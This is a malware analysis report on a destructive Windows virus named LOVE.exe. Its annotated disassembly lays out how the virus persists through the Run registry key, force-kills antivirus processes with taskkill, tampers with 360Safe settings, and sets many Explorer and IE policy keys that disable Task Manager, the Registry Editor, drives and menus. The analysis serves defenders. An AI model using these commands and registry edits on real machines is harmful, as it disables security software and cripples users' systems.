Analysis of LOVE.exe
Basic information
Report title: Analysis of a malicious program
Author: Thend
Report updated: 2012.08.03
Sample discovery date: unknown
Sample type: destructive virus
Sample file MD5 checksum: c0d9cec618648730f44f2d5a3bd403db
Packer: none
Language: VC++6.0
Systems at risk: Windows
Related vulnerabilities: none
Overview
The program adds itself to the registry so that it starts automatically. It drops an icon file of its own, sets that icon as the default icon for all applications, and disables and hides most of the computer's functions, so that the computer can no longer work normally at all.
Symptoms on the infected system and network
Hidden: all files and folders; the Start menu's Run, Shut Down, Log Off, Search and Log On; disk drives; drives; Folder Options; the IE home page option group; the IE File menu; the IE Favorites bar; Internet Options.
Disabled: Control Panel, Task Manager, drives, printing, IE View Source, IE downloads, the right-click context menu, restarting into the DOS environment, the Documents menu, the right mouse button. All antivirus software is shut down. All application icons are changed. TXT and INF files open by default with: view picture.
File system changes
An image named Aver.ico is created in the directory C:\windows\system32\; two files, del.bat and ddel.bat, are created in the same directory as the main program; at the end all of them are deleted.
Registry changes
These are covered directly in the code analysis; there are a great many, so they are not listed one by one. The main one is:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\LOVE.exe SUCCESS "C:\Documents and Settings\Administrator\桌面\LOVE.exe"
Analysis of the malicious program itself:
004010CB /. 55 push ebp ; set a breakpoint at the function entry
004010CC |. 8BEC mov ebp,esp
004010CE |. 81EC 14000000 sub esp,0x14
004010D4 |. 68 01030080 push 0x80000301
004010D9 |. 6A 00 push 0x0
004010DB |. 68 E8030000 push 0x3E8
004010E0 |. 68 01000000 push 0x1
004010E5 |. BB 703E4000 mov ebx,LOVE.00403E70
004010EA |. E8 64220000 call LOVE.00403353
004010EF |. 83C4 10 add esp,0x10
004010F2 |. 68 00000000 push 0x0
004010F7 |. BB 10354000 mov ebx,LOVE.00403510 ; j
004010FC |. E8 52220000 call LOVE.00403353
00401101 |. 83C4 04 add esp,0x4
00401104 |. 8945 FC mov [local.1],eax
00401107 |. 68 00000000 push 0x0
0040110C |. BB 30354000 mov ebx,LOVE.00403530 ; j
00401111 |. E8 3D220000 call LOVE.00403353 ; loads the virus's own name, LOVE.exe
00401116 |. 83C4 04 add esp,0x4
00401119 |. 8945 F8 mov [local.2],eax
0040111C |. FF75 F8 push [local.2]
0040111F |. 68 D8994600 push LOVE.004699D8 ; \
00401124 |. FF75 FC push [local.1]
00401127 |. B9 03000000 mov ecx,0x3
0040112C |. E8 3EFFFFFF call LOVE.0040106F
00401157 |> \6A 00 push 0x0
00401159 |. 6A 00 push 0x0
0040115B |. 6A 00 push 0x0
0040115D |. 68 04000080 push 0x80000004
00401162 |. 6A 00 push 0x0
00401164 |. 68 DA994600 push LOVE.004699DA ; C:\windows\system32\Aver.ico
00401169 |. 68 01030080 push 0x80000301
0040116E |. 6A 00 push 0x0
00401170 |. 68 00000000 push 0x0
00401175 |. 68 04000080 push 0x80000004
0040117A |. 6A 00 push 0x0
0040117C |. 8B45 F4 mov eax,[local.3]
0040117F |. 85C0 test eax,eax
00401181 |. 75 05 jnz XLOVE.00401188
00401183 |. B8 F7994600 mov eax,LOVE.004699F7
00401188 |> 50 push eax
00401189 |. 68 04000000 push 0x4
0040118E |. B8 01000000 mov eax,0x1
00401193 |. BB 10754400 mov ebx,LOVE.00447510
00401198 |. E8 C8210000 call LOVE.00403365 ; creates an image named Aver.ico in the directory C:\windows\system32\
0040119D |. 83C4 34 add esp,0x34
004011A7 |. 53 push ebx
004011A8 |. E8 B2210000 call LOVE.0040335F
004011AD |. 83C4 04 add esp,0x4
004011B0 |> 68 04000080 push 0x80000004
004011B5 |. 6A 00 push 0x0
004011B7 |. 68 DA994600 push LOVE.004699DA ; C:\windows\system32\Aver.ico
004011BC |. 68 04000080 push 0x80000004
004011C1 |. 6A 00 push 0x0
004011C3 |. 68 F8994600 push LOVE.004699F8 ; SOFTWARE\Classes\exefile\DefaultIcon\
004011C8 |. 68 01030080 push 0x80000301
004011CD |. 6A 00 push 0x0
004011CF |. 68 04000000 push 0x4
004011D4 |. 68 03000000 push 0x3
004011D9 |. BB 103B4000 mov ebx,LOVE.00403B10
004011DE |. E8 70210000 call LOVE.00403353 ; sets the default icon for applications to the Aver.ico just created
004011F0 |. E8 5E210000 call LOVE.00403353 ; loads LOVE.exe again
004011F5 |. 83C4 04 add esp,0x4
004011F8 |. 8945 FC mov [local.1],eax
004011FB |. FF75 FC push [local.1]
004011FE |. 68 1E9A4600 push LOVE.00469A1E ; Software\Microsoft\Windows\CurrentVersion\Run\
00401203 |. B9 02000000 mov ecx,0x2
00401208 |. E8 62FEFFFF call LOVE.0040106F ; adds LOVE.exe to the startup (Run) entries
004012FD |. 83C4 04 add esp,0x4
00401300 |. 8945 FC mov [local.1],eax
00401303 |. 68 4D9A4600 push LOVE.00469A4D ; \del.bat
00401308 |. FF75 FC push [local.1]
0040130B |. B9 02000000 mov ecx,0x2
00401310 |. E8 5AFDFFFF call LOVE.0040106F ; in a moment a del.bat will be created on the desktop
00401315 |. 83C4 08 add esp,0x8
00401318 |. 8945 F8 mov [local.2],eax
0040131B |. 8B5D FC mov ebx,[local.1]
0040131E |. 85DB test ebx,ebx
00401320 |. 74 09 je XLOVE.0040132B
00401322 |. 53 push ebx
00401323 |. E8 37200000 call LOVE.0040335F
00401382 |. 68 799A4600 push LOVE.00469A79 ; \ddel.bat
00401387 |. FF75 FC push [local.1]
0040138A |. B9 02000000 mov ecx,0x2
0040138F |. E8 DBFCFFFF call LOVE.0040106F
00401394 |. 83C4 08 add esp,0x8
00401397 |. 8945 F8 mov [local.2],eax
0040139A |. 8B5D FC mov ebx,[local.1]
0040139D |. 85DB test ebx,ebx
0040139F |. 74 09 je XLOVE.004013AA
004013A1 |. 53 push ebx
004013A2 |. E8 B81F0000 call LOVE.0040335F
004013A7 |. 83C4 04 add esp,0x4
004013AA |> 68 05000080 push 0x80000005
004013AF |. 6A 00 push 0x0
004013B1 |. 68 839A4600 push LOVE.00469A83
004013B6 |. 68 04000080 push 0x80000004
004013BB |. 6A 00 push 0x0
004013BD |. 8B45 F8 mov eax,[local.2]
004013C0 |. 85C0 test eax,eax
004013C2 |. 75 05 jnz XLOVE.004013C9
004013C4 |. B8 F7994600 mov eax,LOVE.004699F7
004013C9 |> 50 push eax
004013CA |. 68 02000000 push 0x2
004013CF |. BB 30374000 mov ebx,LOVE.00403730
004013D4 |. E8 7A1F0000 call LOVE.00403353 ; creates a ddel.bat on the desktop
004013D9 |. 83C4 1C add esp,0x1C
004013E4 |. E8 761F0000 call LOVE.0040335F
004013E9 |. 83C4 04 add esp,0x4
004013EC |> 68 00000000 push 0x0
004013F1 |. B8 01000000 mov eax,0x1
004013F6 |. BB 20764400 mov ebx,LOVE.00447620
004013FB |. E8 651F0000 call LOVE.00403365 ; the taskbar is gone...
00401400 |. 83C4 04 add esp,0x4
00401403 |. 68 00000000 push 0x0
00401408 |. B8 01000000 mov eax,0x1
0040140D |. BB C0754400 mov ebx,LOVE.004475C0
00401412 |. E8 4E1F0000 call LOVE.00403365
00401440 |. 83C4 04 add esp,0x4
00401443 |. 8945 FC mov [local.1],eax
00401446 |. 68 799A4600 push LOVE.00469A79 ; \ddel.bat
0040144B |. FF75 FC push [local.1]
0040144E |. B9 02000000 mov ecx,0x2
00401453 |. E8 17FCFFFF call LOVE.0040106F
00401458 |. 83C4 08 add esp,0x8
0040145B |. 8945 F8 mov [local.2],eax
0040145E |. 8B5D FC mov ebx,[local.1]
00401461 |. 85DB test ebx,ebx
00401463 |. 74 09 je XLOVE.0040146E
00401465 |. 53 push ebx
00401466 |. E8 F41E0000 call LOVE.0040335F
0040146B |. 83C4 04 add esp,0x4
0040146E |> 68 01030080 push 0x80000301
00401473 |. 6A 00 push 0x0
00401475 |. 68 01000000 push 0x1
0040147A |. 68 02000080 push 0x80000002
0040147F |. 6A 00 push 0x0
00401481 |. 68 00000000 push 0x0
00401486 |. 68 04000080 push 0x80000004
0040148B |. 6A 00 push 0x0
0040148D |. 8B45 F8 mov eax,[local.2]
00401490 |. 85C0 test eax,eax
00401492 |. 75 05 jnz XLOVE.00401499
00401494 |. B8 F7994600 mov eax,LOVE.004699F7
00401499 |> 50 push eax
0040149A |. 68 03000000 push 0x3
0040149F |. BB 80334000 mov ebx,LOVE.00403380
004014A4 |. E8 AA1E0000 call LOVE.00403353 ; runs ddel.bat
004014D2 |. E8 7C1E0000 call LOVE.00403353
004014D7 |. 83C4 10 add esp,0x10
004014DA |. 68 01030080 push 0x80000301
004014DF |. 6A 00 push 0x0
004014E1 |. 68 01000000 push 0x1
004014E6 |. 68 02000080 push 0x80000002
004014EB |. 6A 00 push 0x0
004014ED |. 68 00000000 push 0x0
004014F2 |. 68 04000080 push 0x80000004
004014F7 |. 6A 00 push 0x0
004014F9 |. 68 DA9A4600 push LOVE.00469ADA ; cmd /c taskkill /f /im Aver.exe
004014FE |. 68 03000000 push 0x3
00401503 |. BB 80334000 mov ebx,LOVE.00403380
00401508 |. E8 461E0000 call LOVE.00403353 ; deletes that Aver.ico icon
00401525 |. 68 4D9A4600 push LOVE.00469A4D ; \del.bat
0040152A |. FF75 FC push [local.1]
0040152D |. B9 02000000 mov ecx,0x2
00401532 |. E8 38FBFFFF call LOVE.0040106F
00401537 |. 83C4 08 add esp,0x8
0040153A |. 8945 F8 mov [local.2],eax
0040153D |. 8B5D FC mov ebx,[local.1]
00401540 |. 85DB test ebx,ebx
00401542 |. 74 09 je XLOVE.0040154D
00401544 |. 53 push ebx
00401545 |. E8 151E0000 call LOVE.0040335F
0040154A |. 83C4 04 add esp,0x4
0040154D |> 68 01030080 push 0x80000301
00401552 |. 6A 00 push 0x0
00401554 |. 68 01000000 push 0x1
00401559 |. 68 02000080 push 0x80000002
0040155E |. 6A 00 push 0x0
00401560 |. 68 00000000 push 0x0
00401565 |. 68 04000080 push 0x80000004
0040156A |. 6A 00 push 0x0
0040156C |. 8B45 F8 mov eax,[local.2]
0040156F |. 85C0 test eax,eax
00401571 |. 75 05 jnz XLOVE.00401578
00401573 |. B8 F7994600 mov eax,LOVE.004699F7
00401578 |> 50 push eax
00401579 |. 68 03000000 push 0x3
0040157E |. BB 80334000 mov ebx,LOVE.00403380
00401583 |. E8 CB1D0000 call LOVE.00403353 ; runs del.bat and deletes it
00401593 |. E8 C71D0000 call LOVE.0040335F
00401598 |. 83C4 04 add esp,0x4
0040159B |> 68 04000080 push 0x80000004
004015A0 |. 6A 00 push 0x0
004015A2 |. 68 FA9A4600 push LOVE.00469AFA ; 2056年1月1日 (January 1, 2056)
004015A7 |. 68 01000000 push 0x1
004015AC |. BB B0354000 mov ebx,LOVE.004035B0
004015B1 |. E8 9D1D0000 call LOVE.00403353
004015B6 |. 83C4 10 add esp,0x10
004015B9 |. 68 03000080 push 0x80000003
004015BE |. 52 push edx
004015BF |. 50 push eax
004015C0 |. 68 01000000 push 0x1
004015C5 |. BB C0364000 mov ebx,LOVE.004036C0
004015CA |. E8 841D0000 call LOVE.00403353 ; sets your system date to January 1, 2056
004015D2 |. 68 01030080 push 0x80000301
004015D7 |. 6A 00 push 0x0
004015D9 |. 68 01000000 push 0x1
004015DE |. 68 02000080 push 0x80000002
004015E3 |. 6A 00 push 0x0
004015E5 |. 68 00000000 push 0x0
004015EA |. 68 04000080 push 0x80000004
004015EF |. 6A 00 push 0x0
004015F1 |. 68 079B4600 push LOVE.00469B07 ; taskkill /f /im kavsvc.exe
004015F6 |. 68 03000000 push 0x3
004015FB |. BB 80334000 mov ebx,LOVE.00403380
00401600 |. E8 4E1D0000 call LOVE.00403353 ; finds and force-kills Kaspersky
00401608 |. 68 01030080 push 0x80000301
0040160D |. 6A 00 push 0x0
0040160F |. 68 01000000 push 0x1
00401614 |. 68 02000080 push 0x80000002
00401619 |. 6A 00 push 0x0
0040161B |. 68 00000000 push 0x0
00401620 |. 68 04000080 push 0x80000004
00401625 |. 6A 00 push 0x0
00401627 |. 68 229B4600 push LOVE.00469B22 ; taskkill /f /im KVXP.kxp
0040162C |. 68 03000000 push 0x3
00401631 |. BB 80334000 mov ebx,LOVE.00403380
00401636 |. E8 181D0000 call LOVE.00403353 ; finds and force-kills the Jiangmin antivirus process
0040163E |. 68 01030080 push 0x80000301
00401643 |. 6A 00 push 0x0
00401645 |. 68 01000000 push 0x1
0040164A |. 68 02000080 push 0x80000002
0040164F |. 6A 00 push 0x0
00401651 |. 68 00000000 push 0x0
00401656 |. 68 04000080 push 0x80000004
0040165B |. 6A 00 push 0x0
0040165D |. 68 3B9B4600 push LOVE.00469B3B ; taskkill /f /im Rav.exe
00401662 |. 68 03000000 push 0x3
00401667 |. BB 80334000 mov ebx,LOVE.00403380
0040166C |. E8 E21C0000 call LOVE.00403353 ; shuts down Rising
00401674 |. 68 01030080 push 0x80000301
00401679 |. 6A 00 push 0x0
0040167B |. 68 01000000 push 0x1
00401680 |. 68 02000080 push 0x80000002
00401685 |. 6A 00 push 0x0
00401687 |. 68 00000000 push 0x0
0040168C |. 68 04000080 push 0x80000004
00401691 |. 6A 00 push 0x0
00401693 |. 68 539B4600 push LOVE.00469B53 ; taskkill /f /im Ravmon.exe
00401698 |. 68 03000000 push 0x3
0040169D |. BB 80334000 mov ebx,LOVE.00403380
004016A2 |. E8 AC1C0000 call LOVE.00403353 ; shuts down Rising's monitor program
004016AA |. 68 01030080 push 0x80000301
004016AF |. 6A 00 push 0x0
004016B1 |. 68 01000000 push 0x1
004016B6 |. 68 02000080 push 0x80000002
004016BB |. 6A 00 push 0x0
004016BD |. 68 00000000 push 0x0
004016C2 |. 68 04000080 push 0x80000004
004016C7 |. 6A 00 push 0x0
004016C9 |. 68 6E9B4600 push LOVE.00469B6E ; taskkill /f /im Mcshield.exe
004016CE |. 68 03000000 push 0x3
004016D3 |. BB 80334000 mov ebx,LOVE.00403380
004016D8 |. E8 761C0000 call LOVE.00403353 ; shuts down the McAfee VirusScan core process
004016E0 |. 68 01030080 push 0x80000301
004016E5 |. 6A 00 push 0x0
004016E7 |. 68 01000000 push 0x1
004016EC |. 68 02000080 push 0x80000002
004016F1 |. 6A 00 push 0x0
004016F3 |. 68 00000000 push 0x0
004016F8 |. 68 04000080 push 0x80000004
004016FD |. 6A 00 push 0x0
004016FF |. 68 8B9B4600 push LOVE.00469B8B ; taskkill /f /im VsTskMgr.exe
00401704 |. 68 03000000 push 0x3
00401709 |. BB 80334000 mov ebx,LOVE.00403380
0040170E |. E8 401C0000 call LOVE.00403353 ; shuts down a McAfee VirusScan component
00401716 |. 68 01030080 push 0x80000301
0040171B |. 6A 00 push 0x0
0040171D |. 68 00000000 push 0x0
00401722 |. 68 04000080 push 0x80000004
00401727 |. 6A 00 push 0x0
00401729 |. 68 A89B4600 push LOVE.00469BA8 ; SOFTWARE\360Safe\safemon\ExecAccess
0040172E |. 68 01030080 push 0x80000301
00401733 |. 6A 00 push 0x0
00401735 |. 68 04000000 push 0x4
0040173A |. 68 03000000 push 0x3
0040173F |. BB 103B4000 mov ebx,LOVE.00403B10
00401744 |. E8 0A1C0000 call LOVE.00403353
00401749 |. 83C4 28 add esp,0x28
0040174C |. 68 01030080 push 0x80000301
00401751 |. 6A 00 push 0x0
00401753 |. 68 00000000 push 0x0
00401758 |. 68 04000080 push 0x80000004
0040175D |. 6A 00 push 0x0
0040175F |. 68 CC9B4600 push LOVE.00469BCC ; SOFTWARE\360Safe\safemon\MonAccess
00401764 |. 68 01030080 push 0x80000301
00401769 |. 6A 00 push 0x0
0040176B |. 68 04000000 push 0x4
00401770 |. 68 03000000 push 0x3
00401775 |. BB 103B4000 mov ebx,LOVE.00403B10
0040177A |. E8 D41B0000 call LOVE.00403353
0040177F |. 83C4 28 add esp,0x28
00401782 |. 68 01030080 push 0x80000301
00401787 |. 6A 00 push 0x0
00401789 |. 68 00000000 push 0x0
0040178E |. 68 04000080 push 0x80000004
00401793 |. 6A 00 push 0x0
00401795 |. 68 EF9B4600 push LOVE.00469BEF ; SOFTWARE\360Safe\safemon\SiteAccess
0040179A |. 68 01030080 push 0x80000301
0040179F |. 6A 00 push 0x0
004017A1 |. 68 04000000 push 0x4
004017A6 |. 68 03000000 push 0x3
004017AB |. BB 103B4000 mov ebx,LOVE.00403B10
004017B0 |. E8 9E1B0000 call LOVE.00403353
004017B5 |. 83C4 28 add esp,0x28
004017B8 |. 68 01030080 push 0x80000301
004017BD |. 6A 00 push 0x0
004017BF |. 68 00000000 push 0x0
004017C4 |. 68 04000080 push 0x80000004
004017C9 |. 6A 00 push 0x0
004017CB |. 68 139C4600 push LOVE.00469C13 ; SOFTWARE\360Safe\safemon\UDiskAccess
004017D0 |. 68 01030080 push 0x80000301
004017D5 |. 6A 00 push 0x0
004017D7 |. 68 04000000 push 0x4
004017DC |. 68 03000000 push 0x3
004017E1 |. BB 103B4000 mov ebx,LOVE.00403B10
004017E6 |. E8 681B0000 call LOVE.00403353
004017EB |. 83C4 28 add esp,0x28
004017EE |. 68 01030080 push 0x80000301
004017F3 |. 6A 00 push 0x0
004017F5 |. 68 01000000 push 0x1
004017FA |. 68 02000080 push 0x80000002
004017FF |. 6A 00 push 0x0
00401801 |. 68 00000000 push 0x0
00401806 |. 68 04000080 push 0x80000004
0040180B |. 6A 00 push 0x0
0040180D |. 68 389C4600 push LOVE.00469C38 ; taskkill /f /im 360tray.exe
00401812 |. 68 03000000 push 0x3
00401817 |. BB 80334000 mov ebx,LOVE.00403380
0040181C |. E8 321B0000 call LOVE.00403353 ; in short, shuts down everything belonging to 360
00401824 |. 68 04000080 push 0x80000004
00401829 |. 6A 00 push 0x0
0040182B |. 68 549C4600 push LOVE.00469C54 ; jpegfile
00401830 |. 68 04000080 push 0x80000004
00401835 |. 6A 00 push 0x0
00401837 |. 68 5D9C4600 push LOVE.00469C5D ; .txt\
0040183C |. 68 01030080 push 0x80000301
00401841 |. 6A 00 push 0x0
00401843 |. 68 01000000 push 0x1
00401848 |. 68 03000000 push 0x3
0040184D |. BB 103B4000 mov ebx,LOVE.00403B10
00401852 |. E8 FC1A0000 call LOVE.00403353
00401857 |. 83C4 28 add esp,0x28
0040185A |. 68 04000080 push 0x80000004
0040185F |. 6A 00 push 0x0
00401861 |. 68 549C4600 push LOVE.00469C54 ; jpegfile
00401866 |. 68 04000080 push 0x80000004
0040186B |. 6A 00 push 0x0
0040186D |. 68 639C4600 push LOVE.00469C63 ; .inf\
00401872 |. 68 01030080 push 0x80000301
00401877 |. 6A 00 push 0x0
00401879 |. 68 01000000 push 0x1
0040187E |. 68 03000000 push 0x3
00401883 |. BB 103B4000 mov ebx,LOVE.00403B10
00401888 |. E8 C61A0000 call LOVE.00403353 ; sets all TXT and INF files to open by default with the image viewer
00401890 |. 68 01030080 push 0x80000301
00401895 |. 6A 00 push 0x0
00401897 |. 68 00000000 push 0x0
0040189C |. 68 04000080 push 0x80000004
004018A1 |. 6A 00 push 0x0
004018A3 |. 68 699C4600 push LOVE.00469C69 ; SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
004018A8 |. 68 01030080 push 0x80000301
004018AD |. 6A 00 push 0x0
004018AF |. 68 04000000 push 0x4
004018B4 |. 68 03000000 push 0x3
004018B9 |. BB 103B4000 mov ebx,LOVE.00403B10
004018BE |. E8 901A0000 call LOVE.00403353 ; hides files and folders
004018C6 |. 68 01030080 push 0x80000301
004018CB |. 6A 00 push 0x0
004018CD |. 68 00000000 push 0x0
004018D2 |. 68 04000080 push 0x80000004
004018D7 |. 6A 00 push 0x0
004018D9 |. 68 C89C4600 push LOVE.00469CC8 ; Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
004018DE |. 68 01030080 push 0x80000301
004018E3 |. 6A 00 push 0x0
004018E5 |. 68 03000000 push 0x3
004018EA |. 68 03000000 push 0x3
004018EF |. BB 103B4000 mov ebx,LOVE.00403B10
004018F4 |. E8 5A1A0000 call LOVE.00403353 ; disables Task Manager
004018FC |. 68 01030080 push 0x80000301
00401901 |. 6A 00 push 0x0
00401903 |. 68 01000000 push 0x1
00401908 |. 68 04000080 push 0x80000004
0040190D |. 6A 00 push 0x0
0040190F |. 68 119D4600 push LOVE.00469D11 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
00401914 |. 68 01030080 push 0x80000301
00401919 |. 6A 00 push 0x0
0040191B |. 68 03000000 push 0x3
00401920 |. 68 03000000 push 0x3
00401925 |. BB 103B4000 mov ebx,LOVE.00403B10
0040192A |. E8 241A0000 call LOVE.00403353 ; disables Control Panel
00401932 |. 68 01030080 push 0x80000301
00401937 |. 6A 00 push 0x0
00401939 |. 68 01000000 push 0x1
0040193E |. 68 04000080 push 0x80000004
00401943 |. 6A 00 push 0x0
00401945 |. 68 5C9D4600 push LOVE.00469D5C ; Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools
0040194A |. 68 01030080 push 0x80000301
0040194F |. 6A 00 push 0x0
00401951 |. 68 03000000 push 0x3
00401956 |. 68 03000000 push 0x3
0040195B |. BB 103B4000 mov ebx,LOVE.00403B10
00401960 |. E8 EE190000 call LOVE.00403353 ; disables the Registry Editor
00401968 |. 68 01030080 push 0x80000301
0040196D |. 6A 00 push 0x0
0040196F |. 68 01000000 push 0x1
00401974 |. 68 04000080 push 0x80000004
00401979 |. 6A 00 push 0x0
0040197B |. 68 AB9D4600 push LOVE.00469DAB ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun
00401980 |. 68 01030080 push 0x80000301
00401985 |. 6A 00 push 0x0
00401987 |. 68 03000000 push 0x3
0040198C |. 68 03000000 push 0x3
00401991 |. BB 103B4000 mov ebx,LOVE.00403B10
00401996 |. E8 B8190000 call LOVE.00403353 ; hides Run in the Start menu
0040199E |. 68 01030080 push 0x80000301
004019A3 |. 6A 00 push 0x0
004019A5 |. 68 01000000 push 0x1
004019AA |. 68 04000080 push 0x80000004
004019AF |. 6A 00 push 0x0
004019B1 |. 68 ED9D4600 push LOVE.00469DED ; SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled
004019B6 |. 68 01030080 push 0x80000301
004019BB |. 6A 00 push 0x0
004019BD |. 68 03000000 push 0x3
004019C2 |. 68 03000000 push 0x3
004019C7 |. BB 103B4000 mov ebx,LOVE.00403B10
004019CC |. E8 82190000 call LOVE.00403353 ; disables all disk drives; the disks cannot be seen anywhere
004019D4 |. 68 01060080 push 0x80000601
004019D9 |. 68 FFFFEF41 push 0x41EFFFFF
004019DE |. 68 0000E0FF push 0xFFE00000
004019E3 |. 68 04000080 push 0x80000004
004019E8 |. 6A 00 push 0x0
004019EA |. 68 379E4600 push LOVE.00469E37 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
004019EF |. 68 01030080 push 0x80000301
004019F4 |. 6A 00 push 0x0
004019F6 |. 68 03000000 push 0x3
004019FB |. 68 03000000 push 0x3
00401A00 |. BB 103B4000 mov ebx,LOVE.00403B10
00401A05 |. E8 49190000 call LOVE.00403353 ; hides all drives
00401A0D |. 68 01060080 push 0x80000601
00401A12 |. 68 FFFFEF41 push 0x41EFFFFF
00401A17 |. 68 0000E0FF push 0xFFE00000
00401A1C |. 68 04000080 push 0x80000004
00401A21 |. 6A 00 push 0x0
00401A23 |. 68 7C9E4600 push LOVE.00469E7C ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive
00401A28 |. 68 01030080 push 0x80000301
00401A2D |. 6A 00 push 0x0
00401A2F |. 68 03000000 push 0x3
00401A34 |. 68 03000000 push 0x3
00401A39 |. BB 103B4000 mov ebx,LOVE.00403B10
00401A3E |. E8 10190000 call LOVE.00403353 ; disables all drives
00401A46 |. 68 01030080 push 0x80000301
00401A4B |. 6A 00 push 0x0
00401A4D |. 68 01000000 push 0x1
00401A52 |. 68 04000080 push 0x80000004
00401A57 |. 6A 00 push 0x0
00401A59 |. 68 C69E4600 push LOVE.00469EC6 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
00401A5E |. 68 01030080 push 0x80000301
00401A63 |. 6A 00 push 0x0
00401A65 |. 68 03000000 push 0x3
00401A6A |. 68 03000000 push 0x3
00401A6F |. BB 103B4000 mov ebx,LOVE.00403B10
00401A74 |. E8 DA180000 call LOVE.00403353 ; disables Folder Options
00401A7C |. 68 01030080 push 0x80000301
00401A81 |. 6A 00 push 0x0
00401A83 |. 68 01000000 push 0x1
00401A88 |. 68 04000080 push 0x80000004
00401A8D |. 6A 00 push 0x0
00401A8F |. 68 129F4600 push LOVE.00469F12 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
00401A94 |. 68 01030080 push 0x80000301
00401A99 |. 6A 00 push 0x0
00401A9B |. 68 03000000 push 0x3
00401AA0 |. 68 03000000 push 0x3
00401AA5 |. BB 103B4000 mov ebx,LOVE.00403B10
00401AAA |. E8 A4180000 call LOVE.00403353 ; hides Shut Down in the Start menu
00401AB2 |. 68 01030080 push 0x80000301
00401AB7 |. 6A 00 push 0x0
00401AB9 |. 68 01000000 push 0x1
00401ABE |. 68 04000080 push 0x80000004
00401AC3 |. 6A 00 push 0x0
00401AC5 |. 68 569F4600 push LOVE.00469F56 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind
00401ACA |. 68 01030080 push 0x80000301
00401ACF |. 6A 00 push 0x0
00401AD1 |. 68 03000000 push 0x3
00401AD6 |. 68 03000000 push 0x3
00401ADB |. BB 103B4000 mov ebx,LOVE.00403B10
00401AE0 |. E8 6E180000 call LOVE.00403353 ; hides Search in the Start menu
00401AE8 |. 68 01030080 push 0x80000301
00401AED |. 6A 00 push 0x0
00401AEF |. 68 01000000 push 0x1
00401AF4 |. 68 04000080 push 0x80000004
00401AF9 |. 6A 00 push 0x0
00401AFB |. 68 999F4600 push LOVE.00469F99 ; Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage
00401B00 |. 68 01030080 push 0x80000301
00401B05 |. 6A 00 push 0x0
00401B07 |. 68 03000000 push 0x3
00401B0C |. 68 03000000 push 0x3
00401B11 |. BB 103B4000 mov ebx,LOVE.00403B10
00401B16 |. E8 38180000 call LOVE.00403353 ; hides the IE home page option group
00401B1E |. 68 01030080 push 0x80000301
00401B23 |. 6A 00 push 0x0
00401B25 |. 68 01000000 push 0x1
00401B2A |. 68 04000080 push 0x80000004
00401B2F |. 6A 00 push 0x0
00401B31 |. 68 DE9F4600 push LOVE.00469FDE ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
00401B36 |. 68 01030080 push 0x80000301
00401B3B |. 6A 00 push 0x0
00401B3D |. 68 03000000 push 0x3
00401B42 |. 68 03000000 push 0x3
00401B47 |. BB 103B4000 mov ebx,LOVE.00403B10
00401B4C |. E8 02180000 call LOVE.00403353 ; hides the IE File menu
00401B54 |. 68 01030080 push 0x80000301
00401B59 |. 6A 00 push 0x0
00401B5B |. 68 01000000 push 0x1
00401B60 |. 68 04000080 push 0x80000004
00401B65 |. 6A 00 push 0x0
00401B67 |. 68 25A04600 push LOVE.0046A025 ; Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites
00401B6C |. 68 01030080 push 0x80000301
00401B71 |. 6A 00 push 0x0
00401B73 |. 68 03000000 push 0x3
00401B78 |. 68 03000000 push 0x3
00401B7D |. BB 103B4000 mov ebx,LOVE.00403B10
00401B82 |. E8 CC170000 call LOVE.00403353 ; hides the Favorites option
00401B8A |. 68 01030080 push 0x80000301
00401B8F |. 6A 00 push 0x0
00401B91 |. 68 01000000 push 0x1
00401B96 |. 68 04000080 push 0x80000004
00401B9B |. 6A 00 push 0x0
00401B9D |. 68 6CA04600 push LOVE.0046A06C ; Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting
00401BA2 |. 68 01030080 push 0x80000301
00401BA7 |. 6A 00 push 0x0
00401BA9 |. 68 03000000 push 0x3
00401BAE |. 68 03000000 push 0x3
00401BB3 |. BB 103B4000 mov ebx,LOVE.00403B10
00401BB8 |. E8 96170000 call LOVE.00403353 ; disables IE printing
00401BC0 |. 68 01030080 push 0x80000301
00401BC5 |. 6A 00 push 0x0
00401BC7 |. 68 01000000 push 0x1
00401BCC |. 68 04000080 push 0x80000004
00401BD1 |. 6A 00 push 0x0
00401BD3 |. 68 B2A04600 push LOVE.0046A0B2 ; Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions
00401BD8 |. 68 01030080 push 0x80000301
00401BDD |. 6A 00 push 0x0
00401BDF |. 68 03000000 push 0x3
00401BE4 |. 68 03000000 push 0x3
00401BE9 |. BB 103B4000 mov ebx,LOVE.00403B10
00401BEE |. E8 60170000 call LOVE.00403353 ; hides Internet Options
00401BF6 |. 68 01030080 push 0x80000301
00401BFB |. 6A 00 push 0x0
00401BFD |. 68 01000000 push 0x1
00401C02 |. 68 04000080 push 0x80000004
00401C07 |. 6A 00 push 0x0
00401C09 |. 68 FEA04600 push LOVE.0046A0FE ; Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource
00401C0E |. 68 01030080 push 0x80000301
00401C13 |. 6A 00 push 0x0
00401C15 |. 68 03000000 push 0x3
00401C1A |. 68 03000000 push 0x3
00401C1F |. BB 103B4000 mov ebx,LOVE.00403B10
00401C24 |. E8 2A170000 call LOVE.00403353 ; prevents IE View Source
00401C2C |. 68 01030080 push 0x80000301
00401C31 |. 6A 00 push 0x0
00401C33 |. 68 03000000 push 0x3
00401C38 |. 68 04000080 push 0x80000004
00401C3D |. 6A 00 push 0x0
00401C3F |. 68 46A14600 push LOVE.0046A146 ; Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803
00401C44 |. 68 01030080 push 0x80000301
